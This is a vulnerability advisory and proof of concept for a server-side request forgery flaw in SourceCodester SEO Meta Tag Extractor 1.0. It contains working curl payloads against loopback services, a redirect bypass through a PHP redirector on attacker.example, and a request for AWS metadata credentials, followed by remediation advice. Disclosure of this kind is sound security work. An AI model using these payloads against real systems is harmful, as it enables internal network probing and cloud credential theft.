# SourceCodester SEO Meta Tag Extractor 1.0 - Server-Side Request Forgery via URL Parameter
## Vulnerability Information
| Field | Detail |
|-------------|----------------------------------------------|
| **Product** | SEO Meta Tag Extractor |
| **Vendor** | SourceCodester (Author: rems / remyandrade) |
| **Version** | 1.0 |
| **Type** | Server-Side Request Forgery (CWE-918) |
| **Author** | Kevin Chiang |
| **Date** | 2026-05-11 |
| **CVSS** | 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |
---
## Affected Component
- **Entry Endpoint**: `index.php` (POST handler)
- **Vulnerable Function**: `fetchMetaTags($url)`
- **Sink #1**: `get_headers($url, 1)` at `index.php:8`
- **Sink #2**: `file_get_contents($url)` at `index.php:13`
- **Parameter**: `url` (application/x-www-form-urlencoded, POST)
---
## Description
A server-side request forgery vulnerability was found in SourceCodester
SEO Meta Tag Extractor 1.0. It affects the function `fetchMetaTags()` of
the file `index.php`. The application accepts a user-supplied URL via
the `url` POST parameter and passes it directly to `get_headers()` and
`file_get_contents()` without any restriction against private, loopback,
or link-local IP ranges. The only validation performed is
`FILTER_VALIDATE_URL`, which checks syntactic URL validity but does not
block internal addresses. In addition, `file_get_contents()` follows
HTTP redirects by default, allowing an attacker-controlled external URL
to redirect the server-side fetch to an internal endpoint, bypassing any
naive hostname/IP blacklist that may be added later.
The root cause is the absence of network-layer validation on the
attacker-controlled URL:
```php
// index.php (line 3-13)
function fetchMetaTags($url) {
if (!filter_var($url, FILTER_VALIDATE_URL)) {
return ['error' => 'Invalid URL format'];
}
$headers = get_headers($url, 1); // SINK #1
if (strpos($headers[0], '200') === false) {
return ['error' => 'URL not reachable'];
}
$html = @file_get_contents($url); // SINK #2
...
}
```
The parsed HTML content is then echoed back to the attacker via the
result page (title, meta description, OG tags, links), enabling a fully
read-capable SSRF.
---
## Steps to Reproduce
### Environment
- OS: Ubuntu 22.04 LTS
- Web Server: PHP 8.1.2 built-in development server
- PHP: 8.1.2
- Test URL: `http://192.168.2.132:8080/`
### Steps
1. Deploy SEO Meta Tag Extractor 1.0 on a host that runs an internal
service bound to its loopback interface
(e.g., Python HTTP server, admin panel, Redis, or the cloud
metadata service at `169.254.169.254`).
2. Start the vulnerable application:
```bash
cd seo-meta-tag-extractor/
php -S 0.0.0.0:8080
```
3. From an external host, verify the internal service is NOT directly
reachable:
```bash
curl http://192.168.2.132:9999/ # → connection refused
```
4. Submit the SSRF payload to the vulnerable application:
```bash
curl -X POST 'http://192.168.2.132:8080/' \
--data-urlencode 'url=http://127.0.0.1:9999/'
```
5. Observe that the HTTP response body contains content fetched from
`127.0.0.1:9999` (title, meta tags, etc.) - the server made the
request on behalf of the attacker.
---
## Proof of Concept
### Simulated Internal Service
On the victim host, run a service bound to loopback only:
```bash
mkdir -p /tmp/internal && cd /tmp/internal
cat > index.html <<'EOF'
<!DOCTYPE html>
<html><head>
<title>INTERNAL SECRET PAGE</title>
<meta name="description" content="Bound to 127.0.0.1 only.">
<meta name="keywords" content="admin,DB-password=hunter2,internal">
</head><body><h1>SSRF success</h1></body></html>
EOF
# --bind 127.0.0.1 → reachable from PHP only, NOT from external network
python3 -m http.server 9999 --bind 127.0.0.1
```
### Vulnerable HTTP Request
```http
POST /index.php HTTP/1.1
Host: 192.168.2.132:8080
Content-Type: application/x-www-form-urlencoded
url=http%3A%2F%2F127.0.0.1%3A9999%2F
```
### cURL PoC
```bash
# 1. Confirm internal service is not externally accessible
curl --max-time 3 http://192.168.2.132:9999/
# → curl: (7) Failed to connect ...
# 2. Trigger SSRF via the vulnerable application
curl -X POST 'http://192.168.2.132:8080/' \
--data-urlencode 'url=http://127.0.0.1:9999/' \
| grep -i 'INTERNAL SECRET'
# → <span class="meta-value">INTERNAL SECRET PAGE</span>
```
### Expected Result
The HTTP response from the vulnerable application contains the title
`INTERNAL SECRET PAGE` and other metadata fetched from the loopback-only
service, proving that the server-side request was successfully made on
behalf of an unauthenticated remote attacker.
### Redirect Bypass PoC (defeats naive IP blacklists)
Host a 302 redirector under attacker control:
```php
<?php
// redir.php on attacker.example
header("Location: http://127.0.0.1:9999/");
exit;
```
Then submit the public URL:
```bash
curl -X POST 'http://192.168.2.132:8080/' \
--data-urlencode 'url=http://attacker.example/redir.php'
```
`file_get_contents()` follows the 302 and still fetches the internal
resource, even if the input URL passes any blacklist check.
### Cloud Metadata Attack (deployment-dependent)
When deployed on AWS EC2 without IMDSv2 enforced:
```bash
curl -X POST 'http://<target>/index.php' \
--data-urlencode 'url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'
```
→ The application's response leaks the IAM role name, which can be
chained with a second request to retrieve temporary credentials.
---
## Code Flow
```
[Remote Attacker]
│
│ POST /index.php (url=http://127.0.0.1:9999/)
↓
fetchMetaTags($url) index.php:3
│
│ filter_var($url, FILTER_VALIDATE_URL)
│ └─ syntactic check only; private IPs PASS
│
↓
get_headers($url, 1) index.php:8 【SINK #1】
│ PHP issues HTTP request to 127.0.0.1:9999
│
↓
file_get_contents($url) index.php:13 【SINK #2】
│ PHP fetches response body
│ (follows HTTP 3xx redirects by default)
│
↓
DOMDocument::loadHTML($html) index.php:18-19
│ Parses internal-only content
│
↓
Echo extracted meta tags back to attacker index.php:117-217
│ title, description, OG/Twitter cards, canonical, h1, etc.
↓
Internal data exposed to unauthenticated remote attacker
```
---
## Impact
An unauthenticated remote attacker can:
- Probe internal/private network services not reachable from the
public Internet (loopback, RFC 1918, link-local).
- Read responses from internal HTTP-speaking services through the
echoed meta-tag output (full read-capable SSRF).
- Enumerate open ports on the host and adjacent network by comparing
the `URL not reachable` vs successful response branches.
- On cloud deployments without IMDSv2 enforcement, retrieve cloud
instance metadata (e.g., AWS IMDS at `169.254.169.254`) including
temporary IAM credentials, escalating to cloud account compromise.
- Bypass IP-based access control on internal admin panels that trust
`127.0.0.1` or the host's primary interface.
- Defeat naive URL blacklists by using attacker-controlled HTTP
redirects to internal addresses.
---
## Remediation
The recommended fix combines four controls in `fetchMetaTags()`:
1. **Scheme allowlist**: accept only `http` and `https` (the existing
regex on `index.php:64` also allows `ftp` / `ftps`).
2. **Hostname resolution + IP allowlist**: resolve the hostname with
`gethostbynamel()` and reject any address inside private, loopback,
link-local, or multicast ranges (RFC 1918, `127.0.0.0/8`,
`169.254.0.0/16`, `::1`, `fc00::/7`, etc.).
3. **Disable HTTP redirect following**: use a custom stream context
with `'follow_location' => 0`, and re-validate the redirect target
against the same allowlist for each hop.
4. **Set request timeout and max content length** to limit abuse for
port scanning and denial-of-service.
Example patch sketch:
```php
function isPublicUrl($url) {
$parts = parse_url($url);
if (!$parts || !in_array(strtolower($parts['scheme'] ?? ''),
['http', 'https'])) {
return false;
}
$ips = gethostbynamel($parts['host'] ?? '');
if (!$ips) return false;
foreach ($ips as $ip) {
if (filter_var($ip, FILTER_VALIDATE_IP,
FILTER_FLAG_NO_PRIV_RANGE
| FILTER_FLAG_NO_RES_RANGE) === false) {
return false;
}
}
return true;
}
```
---
## Vendor Notification
| Date | Action |
|------------|----------------------------- |
| 2026-05-11 | Vendor notified via SourceCodester contact form |
---
## References
- Vendor homepage: https://www.sourcecodester.com/
- Project page: https://www.sourcecodester.com/php/18271/seo-meta-tag-extractor-using-php-and-javascript-source-code.html
- Author page: https://www.sourcecodester.com/users/remyandrade
- Related CWE: CWE-918 (Server-Side Request Forgery)
- Related CWE: CWE-441 (Unintended Proxy or Intermediary - 'Confused Deputy')